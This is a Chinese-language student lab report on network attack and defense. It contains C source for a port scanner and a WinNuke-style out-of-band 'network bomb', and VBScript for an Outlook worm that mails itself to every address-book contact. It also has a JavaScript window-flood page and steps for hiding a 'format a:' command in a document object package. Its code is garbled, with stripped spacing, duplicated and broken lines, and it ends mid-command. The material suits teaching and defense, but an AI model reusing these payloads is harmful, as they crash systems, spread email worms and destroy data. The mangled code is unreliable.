網(wǎng)絡(luò)攻擊報(bào)告

一．實(shí)驗(yàn)題目網(wǎng)絡(luò)攻擊與防御。二．實(shí)驗(yàn)環(huán)境PC機(jī)一臺(tái)；三．實(shí)驗(yàn)?zāi)康恼莆沼嘘P(guān)網(wǎng)絡(luò)攻擊與防護(hù)的基本原理； 了解常用網(wǎng)絡(luò)攻擊軟件：掃描器、木馬、密碼破解器等。四．實(shí)驗(yàn)基本原理利用腳本語(yǔ)言、C語(yǔ)言設(shè)計(jì)網(wǎng)絡(luò)攻擊程序：漏洞掃描器、木馬、郵箱攻擊程序等。通過(guò)WIN系統(tǒng)，結(jié)合日志分析、入侵檢測(cè)分析，利用防火墻技術(shù)和WIN安全審核工具，加固自己的網(wǎng)絡(luò)與計(jì)算機(jī)系統(tǒng)。了解程序設(shè)計(jì)思想與基本方法，要求學(xué)生在課余查閱圖書(shū)資料，根據(jù)實(shí)驗(yàn)范例，對(duì)實(shí)驗(yàn)內(nèi)容舉一反三，獨(dú)立設(shè)計(jì)軟件。五．實(shí)驗(yàn)方法概述了解信息收集的原理和掃描器的概念，區(qū)別端口掃描器與漏洞掃描器，它們的應(yīng)用場(chǎng)合及在攻防系統(tǒng)中的作用。掌握常見(jiàn)的掃描器軟件使用方法，如：SATAN、CIS、SuperScan。要求學(xué)生在上機(jī)時(shí)根據(jù)自己使用的掃描器軟件對(duì)實(shí)驗(yàn)室網(wǎng)絡(luò)系統(tǒng)進(jìn)行漏洞掃描并分析掃描的參數(shù)與結(jié)果，將其分析報(bào)告詳細(xì)地寫(xiě)出來(lái)，并解釋其原因及解決的措施。對(duì)掃描的結(jié)果作出正確的分析，根據(jù)分析評(píng)估網(wǎng)絡(luò)系統(tǒng)安全性，必要時(shí)關(guān)閉危險(xiǎn)端口，合理配置計(jì)算機(jī)系統(tǒng)。根據(jù)的實(shí)例，通過(guò)編程要求學(xué)生掌握端口掃描器的設(shè)計(jì)方法。了解常見(jiàn)的監(jiān)聽(tīng)軟件使用方法，要求學(xué)生在上機(jī)時(shí)根據(jù)自己使用的監(jiān)聽(tīng)軟件對(duì)系統(tǒng)進(jìn)行被動(dòng)攻擊所得的參數(shù)與結(jié)果進(jìn)行分析，并按照其分析結(jié)果用實(shí)驗(yàn)報(bào)告形式詳細(xì)地寫(xiě)出來(lái)，要求使用網(wǎng)絡(luò)刺客sniffit、snoop軟件。掌握突破TCP/IP過(guò)濾/防火墻進(jìn)入內(nèi)網(wǎng)的方法，掌握TCPSocket數(shù)據(jù)轉(zhuǎn)發(fā)功能，會(huì)使用相關(guān)的攻擊軟件，如何連接對(duì)方服務(wù)器，寫(xiě)出其步驟。要求學(xué)生理解和掌握如何突破防火墻進(jìn)入對(duì)方系統(tǒng)方法，通過(guò)實(shí)驗(yàn)報(bào)告形式將其論述詳細(xì)地寫(xiě)出來(lái)，具體要求：概述，攻擊原理，使用軟件，攻擊效果（注意要遵守國(guó)家法律，不要破壞對(duì)方資源，僅進(jìn)入系統(tǒng)即可），攻擊過(guò)程流程圖。入侵監(jiān)測(cè)技術(shù)是防火墻技術(shù)合理而有效的補(bǔ)充，要求結(jié)合漏洞掃描器的使用，通過(guò)端口的監(jiān)測(cè)，收集關(guān)鍵信息，查看系統(tǒng)日志，分析其信息，檢查系統(tǒng)中是否有違反安全策略的行為和遭到襲擊的跡象。利用網(wǎng)絡(luò)防火墻、端口安全設(shè)置、日志設(shè)置及入侵監(jiān)測(cè)策略的技術(shù)，最有效地加固計(jì)算機(jī)系統(tǒng)，通過(guò)實(shí)驗(yàn)結(jié)合上述技術(shù)到達(dá)最佳效果，要求寫(xiě)出分析報(bào)告、具體設(shè)置與安全建議。除本書(shū)所介紹的Windows系統(tǒng)漏洞外，要求學(xué)生更深入一層地了解其它漏洞形式，它們的危害是什么？請(qǐng)認(rèn)真總結(jié)和歸納其漏洞類(lèi)型、漏洞危害、漏洞攻擊、漏洞防范。結(jié)合拒絕攻擊實(shí)例分析，要求學(xué)生自學(xué)smurf攻擊方法，獨(dú)立設(shè)計(jì)一個(gè)具有ICMP響應(yīng)的網(wǎng)絡(luò)阻塞攻擊程序。獨(dú)立設(shè)計(jì)一個(gè)簡(jiǎn)單的web攻擊系統(tǒng)，要求具有欺騙形式和攻擊效果。結(jié)合后門(mén)攻擊實(shí)例，要求學(xué)生分析程序設(shè)計(jì)思想，獨(dú)立設(shè)計(jì)一個(gè)具有開(kāi)啟某端口功能和密碼的后門(mén)程序。獨(dú)立設(shè)計(jì)木馬程序，結(jié)合SYNflood攻擊實(shí)例中如何修改注冊(cè)表加載自己的程序的方法和木馬程序?qū)嵗须[藏任務(wù)欄的方法，要求具有自動(dòng)加載、隱藏任務(wù)欄、能夠控制系統(tǒng)的木馬程序。根據(jù)網(wǎng)絡(luò)系統(tǒng)安全策略，要求學(xué)生結(jié)合漏洞掃描器的使用，通過(guò)端口的監(jiān)測(cè)，收集關(guān)鍵信息，查看系統(tǒng)日志，分析其信息，檢查系統(tǒng)中是否有違反安全策略的行為和遭到襲擊的跡象。利用網(wǎng)絡(luò)防火墻、端口安全設(shè)置、日志設(shè)置及入侵監(jiān)測(cè)策略的技術(shù)，最有效地加固計(jì)算機(jī)系統(tǒng)，同時(shí)結(jié)合Windows系統(tǒng)設(shè)置、Internetexplore安全設(shè)置、OutlookExpress的安全優(yōu)化設(shè)計(jì)等方法。通過(guò)實(shí)驗(yàn)結(jié)合上述技術(shù)到達(dá)到網(wǎng)絡(luò)體系安全防護(hù)的最佳效果，要求寫(xiě)出分析報(bào)告、具體設(shè)置與安全建議；實(shí)驗(yàn)主體實(shí)驗(yàn)程序清單，實(shí)驗(yàn)框圖與流程圖，實(shí)驗(yàn)途徑，實(shí)驗(yàn)分析，實(shí)驗(yàn)結(jié)果。1.掃描器：#include<winsock2.h>//包含windows套接字函數(shù)#include"stdio.h"#pragmacomment(lib,"ws2_32")//將注釋wsock32放置到lib文件中#include<stdlib.h>#include<windows.h>voidmain(){WSADATAws;//將ws的數(shù)據(jù)類(lèi)型聲明為WSADATASOCKETs;structsockaddr_inaddr;//系統(tǒng)保存套接字地址的結(jié)構(gòu)體intg1,k;longg2;printf("請(qǐng)輸入要監(jiān)測(cè)最大的端口號(hào)\n");scanf("%d",&k);//下面用connect與端口建立連接，如果可以連接表示端口開(kāi)啟，否則關(guān)閉for(inti=1;i<k;i++)//循環(huán)1到k個(gè)端口{g2=WSAStartup(0x0101,&ws);s=socket(PF_INET,SOCK_STREAM,0);//創(chuàng)建套接字，TCP/IP協(xié)議，流Socketaddr.sin_family=PF_INET;//規(guī)定使用IPv4協(xié)議addr.sin_addr.s_addr=inet_addr("10.1.8.**");//指定為IP為10.1.8.**，實(shí)驗(yàn)時(shí)可以更改addr.sin_port=htons(i);//端口號(hào)if(s==INVALID_SOCKET)break;//如果socket沒(méi)有連接上，退出g1=connect(s,(structsockaddr*)&addr,sizeof(addr));//建立連接,判斷端口是否關(guān)閉if(g1!=0){printf("2:%i端口關(guān)閉\n",i);//指定的端口關(guān)閉WSACleanup();}else{printf("10.1.8.**:%i端口開(kāi)啟\n",i);}//指定的端口開(kāi)放closesocket(s);//關(guān)閉套接字}}2.網(wǎng)絡(luò)炸彈：OOB（OutOfBand）是TCP/IP的一種傳輸模式，是早期Win95/NT的漏洞，攻擊者向系統(tǒng)139端口傳送0字節(jié)數(shù)據(jù)包時(shí)，Win系統(tǒng)自動(dòng)恢復(fù)該數(shù)據(jù)碎片，導(dǎo)致系統(tǒng)資源耗盡，使機(jī)器出現(xiàn)藍(lán)屏，以至死機(jī)。常見(jiàn)有：WinNuke、Voob等網(wǎng)絡(luò)炸彈。#include<windows.h>#include<winsock.h>#include<stdio.h>#pragmacomment(lib,"wsock32.lib")/*定義攻擊目標(biāo)計(jì)算機(jī)的IP地址*/char*IpAddr;intIpPort;//進(jìn)攻端口135或137或139char*Msg="Youarebombed!";/*在被攻擊者計(jì)算機(jī)上顯示"Youarebombed!"字符串*/voidBanner(void){/*被段顯示攻擊者信息*/printf("Windows95OOBBomberbyjiaocang");}intmain(intargc,char*argv[]){/*開(kāi)始定義變量*/structsockaddr_insin;WSADATAwsaData;SOCKETsd;Banner();/*顯示攻擊者信息*/{printf("usage:OOBIpPort135");return1;}

IpAddr=argv[1];IpPort=atoi(argv[2]);/*初始化winsock*/if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0){printf("initsocketerror!");return1;}IpAddr=argv[1];IpPort=atoi(argv[2]);/*初始化winsock*/If(WSAStartup(0x0101,&wsaData)//函數(shù)WSAStartup()初始化WindowsSocketAPI,參數(shù)WAVES指定為winsock版本，參數(shù)wsadata指定為返回WSADATA的數(shù)據(jù)類(lèi)型{printf(“InitTCP/IPstackerror!”);Return1;}}if(wsaData.wVersion!=0x0101){printf("Winsockversionisincorrect");//*版本有錯(cuò)誤,無(wú)法通信*/WSACleanup();//函數(shù)WSACleanup()關(guān)閉Socket套接字//return1;}

if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP))==INVALID_SOCKET){printf("Createsocketerror!");return1;}//*連接到被攻擊者的IP地址#//printf("connecteto[:139]");//*發(fā)送攻擊字符*//if(send(sd,Msg,strlen(Msg),MSG_OOB)==SOCKET_ERROR){printf("senddataerror!");closesocket(sd);WSACleanup();return1;}//*關(guān)閉連接,釋放資源*//closesocket(sd);//WSACleanup();//*提示printf("Bombcomplete!");return0;}3.木馬：特洛伊木馬（Trojanhorse）是一種隱藏了具有攻擊性的應(yīng)用程序，與病毒程序不同，它不具備復(fù)制能力，其功能具有破壞性質(zhì)。大部分木馬采用C/S運(yùn)行模式，當(dāng)服務(wù)端在目標(biāo)計(jì)算機(jī)上被運(yùn)行后，打開(kāi)一個(gè)特定的端口進(jìn)行監(jiān)聽(tīng)，當(dāng)客戶(hù)端向服務(wù)器發(fā)出連接請(qǐng)求時(shí)，服務(wù)器端的相應(yīng)程序會(huì)自動(dòng)運(yùn)行，來(lái)應(yīng)答客戶(hù)機(jī)的請(qǐng)求。4.OutLook漏洞：OutLook攻擊程序是由VBScript編寫(xiě)的，其自我復(fù)制的原理基本上是利用程序?qū)⒈旧淼哪_本內(nèi)容復(fù)制一份到一個(gè)臨時(shí)文件，然后再在傳播的環(huán)節(jié)將其作為附件發(fā)送出去。我們看看腳本是怎么樣完成這個(gè)功能的。Setso=CreateObject("Scripting.FileSystemObject")//是創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象so.GetFile(WScript.ScriptFullName).Copy("C:\dateiname.vbs")//打開(kāi)這個(gè)腳本文件，WScript.ScriptFullName指明是這個(gè)程序本身，是一個(gè)完整的路徑文件名。GetFile函數(shù)獲得這個(gè)文件，Copy函數(shù)將這個(gè)文件復(fù)制到c盤(pán)根目錄下dateiname.vbs這個(gè)文件。通過(guò)OutLook傳播的電子郵件病毒都是向地址簿中存儲(chǔ)的電子郵件地址發(fā)送內(nèi)同相同的腳本附件完成的。SetobjOA=Wscript.CreateObject("Outlook.Application")//創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象SetobjMapi=objOA.GetNameSpace("MAPI")//取得MAPI名字空間Fori=1toobjMapi.AddressLists.Count//遍歷地址簿SetobjAddList=objMapi.AddressLists(i)Forj=1ToobjAddList.AddressEntries.CountSetobjMail=objOA.CreateItem(0)objMail.Recipients.Add(objAddList.AddressEntries(j))//取得郵件地址，收件人objMail.Subject="你好!"objMail.Body="這次給你的附件是我的新文檔！"objMail.Attachments.Add(“c:\virus.vbs")//把自己作為附件擴(kuò)散出去objMail.Send//發(fā)送郵件NextNext……….5.網(wǎng)絡(luò)炸彈：打開(kāi)outlookexpress：進(jìn)入發(fā)信編輯：例：網(wǎng)頁(yè)炸彈，該程序保存在htm為后綴的文件中，放在郵件的附件中，當(dāng)雙擊它時(shí)，出現(xiàn)無(wú)窮網(wǎng)頁(yè)窗口，將系統(tǒng)資源耗盡。<html><head><title>no</title><scriptlanguage=“JavaScript”>使用Java腳本functionopenwindow(){for(i=0;i<3;i++)這里可以控制窗口的個(gè)數(shù)window.open('0')}</script></head><bodyonload="openwindow()"></body></html>如果將電子郵件夾帶在word文擋中，激活炸彈方法如下：建立一個(gè)新文件->執(zhí)行”插入-對(duì)象”->插入”包”對(duì)象->確定start.exe/mformata:/q/autotest/uformat:格式化a:磁盤(pán)/q：快速格式化u:強(qiáng)制執(zhí)行autotest：自動(dòng)執(zhí)行txt炸彈(1)建立一個(gè)僅有簡(jiǎn)單字符的文本文件，任意取文件名，如在記事本建立一個(gè)空格文件。（2）打開(kāi)寫(xiě)字板文檔，將該文件拖入寫(xiě)字板文檔中。也可以從寫(xiě)字板的“插入”—“對(duì)象”，彈出”插入對(duì)象”的對(duì)話框中選擇“從文件創(chuàng)建”—然后在“瀏覽”按鈕選擇要插入的文件。3）調(diào)用對(duì)象包選中該插入的圖標(biāo)，單擊右鍵，選擇“對(duì)象包對(duì)象”--“編輯對(duì)象包”。在“對(duì)象包”的對(duì)話欄中選擇“編輯”--“命令行”可以輸入以下命令。Formata:/q/autotest/ustart.exe/mforma